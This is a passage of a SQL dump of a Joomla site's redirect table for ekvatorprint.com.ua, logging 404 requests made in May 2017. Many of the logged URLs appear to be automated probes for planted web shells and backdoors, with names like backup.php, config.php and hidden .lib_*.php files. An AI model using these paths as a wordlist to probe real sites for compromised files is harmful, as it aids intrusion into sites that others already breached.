00:00:00',301),(9458,'http://ekvatorprint.com.ua/layouts/404.php',NULL,'http://ekvatorprint.com.ua/layouts/404.php','',2,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9459,'http://ekvatorprint.com.ua/libraries/joomla/github/package/data/config.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/github/package/data/config.php','',3,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9460,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/http/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/http/config.php','',2,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9461,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/pig/excekkent.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/pig/excekkent.php','',3,0,'2017-05-11 00:01:10','0000-00-00 00:00:00',301),(9462,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/python/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/python/mysql.php','',3,0,'2017-05-11 00:01:10','0000-00-00 00:00:00',301),(9463,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/hr/backup.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/hr/backup.php','',2,0,'2017-05-11 00:01:10','0000-00-00 00:00:00',301),(9464,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/ntriples/backup.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/ntriples/backup.php','',3,0,'2017-05-11 00:01:10','0000-00-00 00:00:00',301),(9465,'http://ekvatorprint.com.ua/media/foundry/3.1/styles/redactor/config.php',NULL,'http://ekvatorprint.com.ua/media/foundry/3.1/styles/redactor/config.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9466,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/vb/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/vb/config.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9467,'http://ekvatorprint.com.ua/media/foundry/3.1/scripts/event/config.php',NULL,'http://ekvatorprint.com.ua/media/foundry/3.1/scripts/event/config.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9468,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/vhdl/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/vhdl/config.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9469,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/nsis/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/nsis/config.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9470,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/visualblocks/css/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/visualblocks/css/htaccess.php','',5,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9471,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/visualblocks/update.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/visualblocks/update.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9472,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/importcss/ini.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/importcss/ini.php','',2,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9473,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/emoticons/img/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/emoticons/img/htaccess.php','',6,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9474,'http://ekvatorprint.com.ua/media/editors/tinymce/skins/lightgray/fonts/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/skins/lightgray/fonts/htaccess.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9475,'http://ekvatorprint.com.ua/media/foundry/3.1/styles/font-awesome/font/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/foundry/3.1/styles/font-awesome/font/htaccess.php','',3,0,'2017-05-11 00:01:11','0000-00-00 00:00:00',301),(9476,'http://ekvatorprint.com.ua/media/foundry/4.0/scripts/event/mysql.php',NULL,'http://ekvatorprint.com.ua/media/foundry/4.0/scripts/event/mysql.php','',3,0,'2017-05-11 00:01:47','0000-00-00 00:00:00',301),(9477,'http://ekvatorprint.com.ua/modules/mod_articles_news/setup.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_news/setup.php','',2,0,'2017-05-11 00:01:47','0000-00-00 00:00:00',301),(9478,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/chosen/config.php',NULL,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/chosen/config.php','',3,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9479,'http://ekvatorprint.com.ua/media/kunena/avatars/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/kunena/avatars/htaccess.php','',2,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9480,'http://ekvatorprint.com.ua/media/kunena/avatars/resized/size144/ja_playmag/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/kunena/avatars/resized/size144/ja_playmag/htaccess.php','',2,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9481,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/bootstrap/images/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/bootstrap/images/htaccess.php','',3,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9482,'http://ekvatorprint.com.ua/modules/mod_ariimageslider/mod_ariimageslider/elements/color/images/setup.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslider/mod_ariimageslider/elements/color/images/setup.php','',3,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9483,'http://ekvatorprint.com.ua/modules/mod_feed/newstraler.php',NULL,'http://ekvatorprint.com.ua/modules/mod_feed/newstraler.php','',2,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9484,'http://ekvatorprint.com.ua/modules/mod_joomlaapi/mod_joomlaapi.php',NULL,'http://ekvatorprint.com.ua/modules/mod_joomlaapi/mod_joomlaapi.php','',2,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9485,'http://ekvatorprint.com.ua/media/media/images/mime-icon-16/backup.php',NULL,'http://ekvatorprint.com.ua/media/media/images/mime-icon-16/backup.php','',2,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9486,'http://ekvatorprint.com.ua/modules/mod_articles_archive/tmpl/backup.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_archive/tmpl/backup.php','',2,0,'2017-05-11 00:01:48','0000-00-00 00:00:00',301),(9487,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/uniform/images/htaccess.php',NULL,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/uniform/images/htaccess.php','',3,0,'2017-05-11 00:01:49','0000-00-00 00:00:00',301),(9488,'http://ekvatorprint.com.ua/modules/mod_feed/widget.php',NULL,'http://ekvatorprint.com.ua/modules/mod_feed/widget.php','',3,0,'2017-05-11 00:01:49','0000-00-00 00:00:00',301),(9489,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/rangeslider/mysql.php',NULL,'http://ekvatorprint.com.ua/media/foundry/4.0/styles/rangeslider/mysql.php','',3,0,'2017-05-11 00:01:49','0000-00-00 00:00:00',301),(9490,'http://ekvatorprint.com.ua/templates/arc/pagination.php',NULL,'http://ekvatorprint.com.ua/templates/arc/pagination.php','',2,0,'2017-05-11 00:02:19','0000-00-00 00:00:00',301),(9491,'http://ekvatorprint.com.ua/ssa.php',NULL,'http://ekvatorprint.com.ua/ssa.php','',3,0,'2017-05-11 00:02:20','0000-00-00 00:00:00',301),(9492,'http://ekvatorprint.com.ua/plugins/content/kunenadiscuss/language/kz-kz/config.php',NULL,'http://ekvatorprint.com.ua/plugins/content/kunenadiscuss/language/kz-kz/config.php','',3,0,'2017-05-11 00:02:20','0000-00-00 00:00:00',301),(9493,'http://ekvatorprint.com.ua/plugins/installer/codemirror.php',NULL,'http://ekvatorprint.com.ua/plugins/installer/codemirror.php','',3,0,'2017-05-11 00:02:20','0000-00-00 00:00:00',301),(9494,'http://ekvatorprint.com.ua/templates/arc/language/error.php',NULL,'http://ekvatorprint.com.ua/templates/arc/language/error.php','',3,0,'2017-05-11 00:02:20','0000-00-00 00:00:00',301),(9495,'http://ekvatorprint.com.ua/plugins/system/t3/excekkent.php',NULL,'http://ekvatorprint.com.ua/plugins/system/t3/excekkent.php','',3,0,'2017-05-11 00:02:20','0000-00-00 00:00:00',301),(9496,'http://ekvatorprint.com.ua/plugins/content/kunenadiscuss/language/fa-ir/backup.php',NULL,'http://ekvatorprint.com.ua/plugins/content/kunenadiscuss/language/fa-ir/backup.php','',3,0,'2017-05-11 00:02:20','0000-00-00 00:00:00',301),(9497,'http://ekvatorprint.com.ua/plugins/system/nnframework/fields/akeebasubs.html.php',NULL,'http://ekvatorprint.com.ua/plugins/system/nnframework/fields/akeebasubs.html.php','',3,0,'2017-05-11 00:02:20','0000-00-00 00:00:00',301),(9498,'http://ekvatorprint.com.ua/modules/mod_xmlrpc/mod_xmlrpc.php',NULL,'http://ekvatorprint.com.ua/modules/mod_xmlrpc/mod_xmlrpc.php','',4,0,'2017-05-11 00:02:21','0000-00-00 00:00:00',301),(9499,'http://ekvatorprint.com.ua/plugins/system/t3/base-bs3/html/mod_breadcrumbs/htaccess.php',NULL,'http://ekvatorprint.com.ua/plugins/system/t3/base-bs3/html/mod_breadcrumbs/htaccess.php','',3,0,'2017-05-11 00:02:21','0000-00-00 00:00:00',301),(9500,'http://ekvatorprint.com.ua/plugins/installer/recaptcha.php',NULL,'http://ekvatorprint.com.ua/plugins/installer/recaptcha.php','',3,0,'2017-05-11 00:02:21','0000-00-00 00:00:00',301),(9501,'http://ekvatorprint.com.ua/templates/simple_v1/html/layouts/joomla/config.php',NULL,'http://ekvatorprint.com.ua/templates/simple_v1/html/layouts/joomla/config.php','',3,0,'2017-05-11 00:02:54','0000-00-00 00:00:00',301),(9502,'http://ekvatorprint.com.ua/templates/purity_iii/html/com_finder/backup.php',NULL,'http://ekvatorprint.com.ua/templates/purity_iii/html/com_finder/backup.php','',3,0,'2017-05-11 00:02:55','0000-00-00 00:00:00',301),(9503,'http://ekvatorprint.com.ua/templates/beez/html/mod_newsflash/node.module.php',NULL,'http://ekvatorprint.com.ua/templates/beez/html/mod_newsflash/node.module.php','',3,0,'2017-05-11 00:02:55','0000-00-00 00:00:00',301),(9504,'http://ekvatorprint.com.ua/update.php',NULL,'http://ekvatorprint.com.ua/update.php','',9,0,'2017-05-11 00:02:55','0000-00-00 00:00:00',301),(9505,'http://ekvatorprint.com.ua/templates/ja_purity/html/com_content/dashboard.module.php',NULL,'http://ekvatorprint.com.ua/templates/ja_purity/html/com_content/dashboard.module.php','',3,0,'2017-05-11 00:02:55','0000-00-00 00:00:00',301),(9506,'http://ekvatorprint.com.ua/administrator/components/com_easyblog/xmlfiles/blogger/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_easyblog/xmlfiles/blogger/config.php','',2,0,'2017-05-11 02:44:35','0000-00-00 00:00:00',301),(9507,'http://ekvatorprint.com.ua/administrator/components/com_breezingforms/payment_cache/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_breezingforms/payment_cache/backup.php','',2,0,'2017-05-11 02:44:35','0000-00-00 00:00:00',301),(9508,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/classes/shipping/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/classes/shipping/config.php','',2,0,'2017-05-11 02:44:35','0000-00-00 00:00:00',301),(9509,'http://ekvatorprint.com.ua/administrator/components/com_admin/updates.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/updates.php','',3,0,'2017-05-11 02:44:36','0000-00-00 00:00:00',301),(9510,'http://ekvatorprint.com.ua/administrator/components/com_content/models/fields/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_content/models/fields/config.php','',2,0,'2017-05-11 02:44:36','0000-00-00 00:00:00',301),(9511,'http://ekvatorprint.com.ua/components/com_hello/hello.php',NULL,'http://ekvatorprint.com.ua/components/com_hello/hello.php','',4,0,'2017-05-11 02:45:06','0000-00-00 00:00:00',301),(9512,'http://ekvatorprint.com.ua/components/.lib_uninsr.php',NULL,'http://ekvatorprint.com.ua/components/.lib_uninsr.php','',2,0,'2017-05-11 02:45:06','0000-00-00 00:00:00',301),(9513,'http://ekvatorprint.com.ua/components/com_easyblog/themes/greenie/css/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_easyblog/themes/greenie/css/backup.php','',2,0,'2017-05-11 02:45:06','0000-00-00 00:00:00',301),(9514,'http://ekvatorprint.com.ua/components/.lib_llkops.php',NULL,'http://ekvatorprint.com.ua/components/.lib_llkops.php','',2,0,'2017-05-11 02:45:06','0000-00-00 00:00:00',301),(9515,'http://ekvatorprint.com.ua/components/com_kunena/template/crypsis/css/config.php',NULL,'http://ekvatorprint.com.ua/components/com_kunena/template/crypsis/css/config.php','',2,0,'2017-05-11 02:45:07','0000-00-00 00:00:00',301),(9516,'http://ekvatorprint.com.ua/libraries/joomla/cache/.lib_zchiob.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/.lib_zchiob.php','',2,0,'2017-05-11 02:45:07','0000-00-00 00:00:00',301),(9517,'http://ekvatorprint.com.ua/images/sampledata/parks/landscape/backup.php',NULL,'http://ekvatorprint.com.ua/images/sampledata/parks/landscape/backup.php','',2,0,'2017-05-11 02:45:07','0000-00-00 00:00:00',301),(9518,'http://ekvatorprint.com.ua/libraries/joomla/cache/bookmark.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/bookmark.php','',2,0,'2017-05-11 02:46:18','0000-00-00 00:00:00',301),(9519,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sparql/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sparql/config.php','',2,0,'2017-05-11 02:46:19','0000-00-00 00:00:00',301),(9520,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sieve/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sieve/mysql.php','',2,0,'2017-05-11 02:46:19','0000-00-00 00:00:00',301),(9521,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sieve/c0nfig.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sieve/c0nfig.php','',2,0,'2017-05-11 02:46:19','0000-00-00 00:00:00',301),(9522,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/erlang/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/erlang/config.php','',2,0,'2017-05-11 02:46:19','0000-00-00 00:00:00',301),(9523,'http://ekvatorprint.com.ua/media/editors/codemirror/addon/edit/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/addon/edit/mysql.php','',2,0,'2017-05-11 02:46:19','0000-00-00 00:00:00',301),(9524,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/scheme/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/scheme/mysql.php','',2,0,'2017-05-11 02:46:19','0000-00-00 00:00:00',301),(9525,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/tcl/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/tcl/mysql.php','',2,0,'2017-05-11 02:46:49','0000-00-00 00:00:00',301),(9526,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sql/c0nfig.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/sql/c0nfig.php','',2,0,'2017-05-11 02:46:49','0000-00-00 00:00:00',301),(9527,'http://ekvatorprint.com.ua/modules/mod_responsive_contact_form/mod_articles_categories.php',NULL,'http://ekvatorprint.com.ua/modules/mod_responsive_contact_form/mod_articles_categories.php','',2,0,'2017-05-11 02:47:19','0000-00-00 00:00:00',301),(9528,'http://ekvatorprint.com.ua/modules/mod_crontab/mod_crontab.php',NULL,'http://ekvatorprint.com.ua/modules/mod_crontab/mod_crontab.php','',2,0,'2017-05-11 02:47:19','0000-00-00 00:00:00',301),(9529,'http://ekvatorprint.com.ua/styles/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/styles/popup-pomo.php','',8,0,'2017-05-11 02:47:53','0000-00-00 00:00:00',301),(9530,'http://ekvatorprint.com.ua/templates/arc/artx.php',NULL,'http://ekvatorprint.com.ua/templates/arc/artx.php','',2,0,'2017-05-11 02:47:53','0000-00-00 00:00:00',301),(9531,'http://ekvatorprint.com.ua/plugins/installer/totp.php',NULL,'http://ekvatorprint.com.ua/plugins/installer/totp.php','',2,0,'2017-05-11 02:47:54','0000-00-00 00:00:00',301),(9532,'http://ekvatorprint.com.ua/administrator/components/com_falang/models/fields/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_falang/models/fields/config.php','',1,0,'2017-05-11 17:57:34','0000-00-00 00:00:00',301),(9533,'http://ekvatorprint.com.ua/administrator/language/ru-ru/wp-conf.php',NULL,'http://ekvatorprint.com.ua/administrator/language/ru-ru/wp-conf.php','',1,0,'2017-05-11 17:57:34','0000-00-00 00:00:00',301),(9534,'http://ekvatorprint.com.ua/administrator/components/com_jaextmanager/lib/jaupdater/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jaextmanager/lib/jaupdater/config.php','',1,0,'2017-05-11 17:57:34','0000-00-00 00:00:00',301),(9535,'http://ekvatorprint.com.ua/components/com_docman/themes/default/language/excekkent.php',NULL,'http://ekvatorprint.com.ua/components/com_docman/themes/default/language/excekkent.php','',1,0,'2017-05-11 17:58:06','0000-00-00 00:00:00',301),(9536,'http://ekvatorprint.com.ua/components/com_easyblog/assets/images/media/config.php',NULL,'http://ekvatorprint.com.ua/components/com_easyblog/assets/images/media/config.php','',1,0,'2017-05-11 17:58:07','0000-00-00 00:00:00',301),(9537,'http://ekvatorprint.com.ua/components/com_config/view/modules/tmpl/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_config/view/modules/tmpl/backup.php','',1,0,'2017-05-11 17:58:07','0000-00-00 00:00:00',301),(9538,'http://ekvatorprint.com.ua/components/com_jevents/views/day/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_jevents/views/day/tmpl/config.php','',1,0,'2017-05-11 17:58:07','0000-00-00 00:00:00',301),(9539,'http://ekvatorprint.com.ua/images/joomlart/intro-page/stopgloal.php',NULL,'http://ekvatorprint.com.ua/images/joomlart/intro-page/stopgloal.php','',1,0,'2017-05-11 17:58:43','0000-00-00 00:00:00',301),(9540,'http://ekvatorprint.com.ua/components/com_wrapper/views/wrapper/setup.php',NULL,'http://ekvatorprint.com.ua/components/com_wrapper/views/wrapper/setup.php','',1,0,'2017-05-11 17:58:43','0000-00-00 00:00:00',301),(9541,'http://ekvatorprint.com.ua/components/com_users/views/login/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_users/views/login/backup.php','',1,0,'2017-05-11 17:58:43','0000-00-00 00:00:00',301),(9542,'http://ekvatorprint.com.ua/libraries/cms/html/language/en-gb/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/html/language/en-gb/backup.php','',1,0,'2017-05-11 17:59:15','0000-00-00 00:00:00',301),(9543,'http://ekvatorprint.com.ua/libraries/joomla/cache/.lib_fgzn9d.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/.lib_fgzn9d.php','',1,0,'2017-05-11 17:59:16','0000-00-00 00:00:00',301),(9544,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/jinja2/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/jinja2/mysql.php','',1,0,'2017-05-11 18:00:27','0000-00-00 00:00:00',301),(9545,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/htmlmixed/backup.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/htmlmixed/backup.php','',1,0,'2017-05-11 18:00:27','0000-00-00 00:00:00',301),(9546,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/mllike/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/mllike/config.php','',1,0,'2017-05-11 18:00:27','0000-00-00 00:00:00',301),(9547,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/smalltalk/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/smalltalk/mysql.php','',1,0,'2017-05-11 18:00:28','0000-00-00 00:00:00',301),(9548,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/searchreplace/mysql.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/searchreplace/mysql.php','',1,0,'2017-05-11 18:01:05','0000-00-00 00:00:00',301),(9549,'http://ekvatorprint.com.ua/modules/mod_feed/san1.php',NULL,'http://ekvatorprint.com.ua/modules/mod_feed/san1.php','',1,0,'2017-05-11 18:01:36','0000-00-00 00:00:00',301),(9550,'http://ekvatorprint.com.ua/software/backup/backup-files/',NULL,'http://www.google.com/','',3,0,'2017-05-12 01:20:43','0000-00-00 00:00:00',301),(9551,'http://ekvatorprint.com.ua/NOT_EXISTING_URLasdhhjsad73i234oi34/backup/backup-files/',NULL,'http://www.google.com/','',1,0,'2017-05-12 01:20:44','0000-00-00 00:00:00',301),(9552,'http://ekvatorprint.com.ua/media/mass.PhP',NULL,'','',1,0,'2017-05-12 01:55:44','0000-00-00 00:00:00',301),(9553,'http://ekvatorprint.com.ua/media/mass.txt',NULL,'','',1,0,'2017-05-12 01:55:44','0000-00-00 00:00:00',301),(9554,'http://ekvatorprint.com.ua/mobile/backup/',NULL,'http://www.google.com/','',2,0,'2017-05-12 04:17:01','0000-00-00 00:00:00',301),(9555,'http://ekvatorprint.com.ua/NOT_EXISTING_URLasdhhjsad73i234oi34/backup/',NULL,'http://www.google.com/','',1,0,'2017-05-12 04:17:01','0000-00-00 00:00:00',301),(9556,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/zedan.gif',NULL,'','',1,0,'2017-05-12 15:47:11','0000-00-00 00:00:00',301),(9557,'http://ekvatorprint.com.ua/images/modulnie kartini/%D0%BC%D0%BA-129.png',NULL,'','',1,0,'2017-05-12 18:41:08','0000-00-00 00:00:00',301),(9558,'http://ekvatorprint.com.ua/uploads/backup/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-12 20:39:22','0000-00-00 00:00:00',301),(9559,'http://ekvatorprint.com.ua/download/backup/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-13 01:02:02','0000-00-00 00:00:00',301),(9560,'http://ekvatorprint.com.ua/customizer.php',NULL,'','',6,0,'2017-05-13 02:25:01','0000-00-00 00:00:00',301),(9561,'http://ekvatorprint.com.ua/images/backup/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-13 02:30:04','0000-00-00 00:00:00',301),(9562,'http://ekvatorprint.com.ua/NOT_EXISTING_URLasdhhjsad73i234oi34/',NULL,'http://ekvatorprint.com.ua/equipment','',21,0,'2017-05-13 03:58:23','0000-00-00 00:00:00',301),(9563,'http://ekvatorprint.com.ua/_608066839140',NULL,'http://ekvatorprint.com.ua/banner-printing','',2,0,'2017-05-13 11:31:37','0000-00-00 00:00:00',301),(9564,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/config.php','',1,0,'2017-05-13 20:33:28','0000-00-00 00:00:00',301),(9565,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/tag/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/tag/update.php','',1,0,'2017-05-13 20:33:56','0000-00-00 00:00:00',301),(9566,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/tag/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/tag/backup.php','',1,0,'2017-05-13 20:33:56','0000-00-00 00:00:00',301),(9567,'http://ekvatorprint.com.ua/administrator/components/com_chronoforms4/form_actions/event_loop/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_chronoforms4/form_actions/event_loop/config.php','',1,0,'2017-05-13 20:33:56','0000-00-00 00:00:00',301),(9568,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/xjygnvmrv/oqhhl.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/xjygnvmrv/oqhhl.php','',1,0,'2017-05-13 20:33:56','0000-00-00 00:00:00',301),(9569,'http://ekvatorprint.com.ua/administrator/components/com_chronoforms/form_actions/email_verification_sender/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_chronoforms/form_actions/email_verification_sender/config.php','',1,0,'2017-05-13 20:33:56','0000-00-00 00:00:00',301),(9570,'http://ekvatorprint.com.ua/administrator/components/com_modules/layouts/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_modules/layouts/backup.php','',1,0,'2017-05-13 20:33:56','0000-00-00 00:00:00',301),(9571,'http://ekvatorprint.com.ua/administrator/components/com_modules/views/modules/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_modules/views/modules/backup.php','',1,0,'2017-05-13 20:33:56','0000-00-00 00:00:00',301),(9572,'http://ekvatorprint.com.ua/administrator/components/com_chronoforms4/form_actions/show_html/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_chronoforms4/form_actions/show_html/config.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9573,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/fjzf/efxfiveg.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/fjzf/efxfiveg.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9574,'http://ekvatorprint.com.ua/administrator/components/com_checkin/models/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_checkin/models/htaccess.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9575,'http://ekvatorprint.com.ua/administrator/components/com_menus/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_menus/config.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9576,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/warnings/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/warnings/config.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9577,'http://ekvatorprint.com.ua/administrator/components/com_jce/media/fgetss.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jce/media/fgetss.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9578,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/views/default/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/views/default/config.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9579,'http://ekvatorprint.com.ua/administrator/components/com_categories/helpers/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_categories/helpers/config.php','',1,0,'2017-05-13 20:33:57','0000-00-00 00:00:00',301),(9580,'http://ekvatorprint.com.ua/components/com_finder/models/setup.php',NULL,'http://ekvatorprint.com.ua/components/com_finder/models/setup.php','',1,0,'2017-05-13 20:34:26','0000-00-00 00:00:00',301),(9581,'http://ekvatorprint.com.ua/administrator/includes/atomlib.php',NULL,'http://ekvatorprint.com.ua/administrator/includes/atomlib.php','',1,0,'2017-05-13 20:34:26','0000-00-00 00:00:00',301),(9582,'http://ekvatorprint.com.ua/components/com_content/t8rzzb.php',NULL,'http://ekvatorprint.com.ua/components/com_content/t8rzzb.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9583,'http://ekvatorprint.com.ua/components/com_banners/models/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_banners/models/backup.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9584,'http://ekvatorprint.com.ua/components/com_config/view/cms/print_r.php',NULL,'http://ekvatorprint.com.ua/components/com_config/view/cms/print_r.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9585,'http://ekvatorprint.com.ua/administrator/templates/hathor/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/backup.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9586,'http://ekvatorprint.com.ua/administrator/components/com_templates/controllers/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_templates/controllers/backup.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9587,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/tag/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/tag/backup.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9588,'http://ekvatorprint.com.ua/administrator/templates/isis/less/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/isis/less/config.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9589,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_plugins/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_plugins/config.php','',1,0,'2017-05-13 20:34:27','0000-00-00 00:00:00',301),(9590,'http://ekvatorprint.com.ua/components/com_content/models/hgfgjytrehgfdxcgh.php',NULL,'http://ekvatorprint.com.ua/components/com_content/models/hgfgjytrehgfdxcgh.php','',1,0,'2017-05-13 20:34:27','0000-00-00 